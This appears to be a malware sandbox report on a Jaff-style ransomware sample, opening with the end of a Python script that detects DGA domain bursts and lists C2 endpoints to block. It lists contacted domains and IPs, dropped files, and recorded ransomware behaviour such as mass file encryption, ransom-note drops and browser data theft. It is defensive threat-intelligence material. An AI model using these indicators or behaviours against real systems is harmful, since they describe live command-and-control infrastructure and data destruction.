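    generated = [d for d in domains if looks_generated(d.split(".")[0])]
    ratio = len(unresolved) / max(len(domains), 1)
    return {
        "unique_domains": len(domains),
        "unresolved_ratio": round(ratio, 2),
        "lexically_generated": len(generated),
        # A burst of distinct names that mostly never get a connection is the
        # behavioural signature of a DGA, whatever the names look like.
        "dga_burst": len(domains) >= min_domains and ratio >= min_unresolved_ratio,
        # Names that did get a connection are the ones that resolved: block these.
        "c2_candidates": {d: sorted(stats[d]["endpoints"])
                          for d in domains if stats[d]["connections"]},
    }


def block_list(rows):
    """Distinct ip:port endpoints contacted after a successful resolution."""
    return sorted({e for s in parse_rows(rows).values() for e in s["endpoints"]})


if __name__ == "__main__":
    print(triage(SAMPLE_ROWS))
    print(block_list(SAMPLE_ROWS))
```

The lexical test alone misses two of the sixteen names in the sample (vjuxtixi.com and oismeark.com), which is why the verdict is driven by the ratio of queried-but-never-contacted names rather than by how the names look. The table does not record DNS answers, so a name that resolved but was never connected to still counts as unresolved here; with a PCAP the same split can be made on NXDOMAIN responses directly.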

Network

Country Destination Domain Proto
US 8.8.8.8:53 viweabkkfe.com udp
DE 178.162.203.202:80 viweabkkfe.com tcp
DE 178.162.203.202:80 viweabkkfe.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 sjytgtnkdl.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
DE 169.50.13.61:80 sjytgtnkdl.com tcp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 vjuxtixi.com udp
US 8.8.8.8:53 ntrshvquunyzxevkucs.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 ntrshvquunyzxevkucs.com tcp
DE 169.50.13.61:80 ntrshvquunyzxevkucs.com tcp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 okenhqzgxngnkbwouvfm.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 okenhqzgxngnkbwouvfm.com tcp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 wxluitpliymeoirc.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
DE 169.50.13.61:80 wxluitpliymeoirc.com tcp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 kcubcfuhwwn.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp
US 8.8.8.8:53 ajfdmjbywzibf.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 viweabkkfe.com udp
DE 178.162.203.226:80 viweabkkfe.com tcp
DE 178.162.203.226:80 viweabkkfe.com tcp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lscyqrjofqmtn.com udp
US 8.8.8.8:53 wowsfhnnvlwhlotryvh.com udp
US 8.8.8.8:53 linbzxpkmdtngnbdg.com udp
US 8.8.8.8:53 ltcfpuctidqqqxxzpikz.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 zkkfpkbbfnmihohix.com udp
US 8.8.8.8:53 pjgnhujlmwtgf.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 pvqwziehrqscosb.com udp
US 8.8.8.8:53 qxcrbliabignczlmuc.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 bfgtwvhgsibiufmcerl.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 kvmihtamuopvagdlrwzg.com udp
US 8.8.8.8:53 rtlwqvhwuisfnery.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 xzfqmrfmyuaxs.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 dxkirxfzwhnnah.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
US 8.8.8.8:53 vyeaukkyszhdeug.com udp
DE 169.50.13.61:80 kcubcfuhwwn.com tcp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 cpejcogzznpudbsmaxxm.com udp
US 8.8.8.8:53 zvwbjvhfrkqciz.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 pnqclaedmavju.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 qwtzjokvjfvecysgypbd.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 lxpcmncky.com udp
US 8.8.8.8:53 oismeark.com udp
US 8.8.8.8:53 mzwfwjayhom.com udp
US 8.8.8.8:53 xtvklujmo.com udp
US 8.8.8.8:53 kwsrmhroj.com udp
US 8.8.8.8:53 avcctrnrxx.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 towhyechciopdte.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 eiiveuuptweirgz.com udp
US 8.8.8.8:53 tmgskmvaxftffa.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 fryqhsblmvzsal.com udp
US 8.8.8.8:53 ohrpszrfydauhfuzyzbk.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 owsxylebhmuzver.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 hqihrutpabwndvldae.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 vgcdinjoj.com udp
US 8.8.8.8:53 fidkjesxq.com udp
US 8.8.8.8:53 zbzxolintzi.com udp
US 8.8.8.8:53 izaubgigwfl.com udp
US 8.8.8.8:53 yievjaklo.com udp
US 8.8.8.8:53 nuepdkau.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 rjpkxiywinyhjoqltq.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 worazowxtkdznvvz.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 fzzxkhmkfunhotpjmdoy.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 kuyfpapjundhcit.com udp
US 8.8.8.8:53 nxcyhbauwgvdryyz.com udp

Files

C:\Users\Admin\AppData\Local\Temp\hvuZmoyf.exe

C:\Users\Admin\AppData\Roaming\Dirty\DirtyDecrypt.exe

memory/2524-25-0x0000000000560000-0x0000000000574000-memory.dmp

memory/2524-27-0x0000000000560000-0x0000000000574000-memory.dmp

memory/1544-32-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Desktop\SubmitRestore.docx

C:\Users\Admin\Desktop\JoinAssert.xlsx

C:\Users\Admin\Desktop\ProtectOpen.jpeg

C:\Users\Admin\Documents\AssertGroup.doc

C:\Users\Admin\Documents\ConvertToSplit.rtf

C:\Users\Admin\Documents\RegisterDismount.xls

C:\Users\Admin\Documents\ShowUpdate.docm

C:\Users\Admin\Downloads\FindMerge.zip

C:\Users\Admin\Downloads\PushRedo.xlsm

memory/1544-186-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\Music\TestWatch.pdf

C:\Users\Admin\Music\DebugSelect.doc

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:17

Platform

win7-20240729-en

Max time kernel

357s

Max time network

358s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe"

Signatures

Renames multiple (4027) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\ReadMe.txt.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\drivers\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\drivers\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\drivers\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ReadMe.bmp.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ReadMe.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Indicator Removal: File Deletion

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\EnterpriseE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\fr-FR\ReadMe.bmp.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\Ultimate\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\UltimateN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\Ultimate\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnts002.inf_amd64_neutral_ad2aa922aa11af2c\Amd64\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnts003.inf_amd64_neutral_33a68664c7e7ae4b\Amd64\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\UltimateN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\migwiz\PostMigRes\Web\base_images\ReadMe.html.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\SysWOW64\license.rtf.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\UltimateE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\EnterpriseE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky309.inf_amd64_ja-jp_afbb421e3dc1cb6b\Amd64\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\Enterprise\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\HomeBasicE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\eval\HomeBasicN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\WCN\es-ES\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\HomePremiumE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\ProfessionalE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\Ultimate\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\Professional\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\migwiz\PostMigRes\Web\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\HomeBasicE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\UltimateE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\EnterpriseN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\EnterpriseN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\EnterpriseN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnrc00c.inf_amd64_neutral_53a58f4fd7d88575\Amd64\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasic\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremium\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnrc00c.inf_amd64_neutral_53a58f4fd7d88575\Amd64\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\_Default\HomePremiumE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnkm003.inf_amd64_neutral_48652cda3bb15180\Amd64\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\ProfessionalN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\ProfessionalN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\ProfessionalN\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\HomePremium\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\WCN\es-ES\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiabr00a.inf_amd64_neutral_6033065925bcc882\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\HomeBasicN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\UltimateN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HomePremiumN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\System32\LogFiles\SQM\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\_Default\ProfessionalN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\UltimateN\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\UltimateN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\eval\ProfessionalE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\Enterprise\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\OEM\StarterE\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomePremiumE\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\EnterpriseN\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Ultimate\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\eval\Ultimate\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\OEM\Professional\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\HomeBasicN\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Enterprise\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HomePremium\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\Ultimate\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\System32\catroot2\edb006C9.log.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\System32\catroot2\edb006D2.log.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\StarterE\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\eval\Ultimate\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Sets desktop wallpaper using registry

ransomware

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Rondo\\WallpapeR.bmp" C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Drops file in Program Files directory

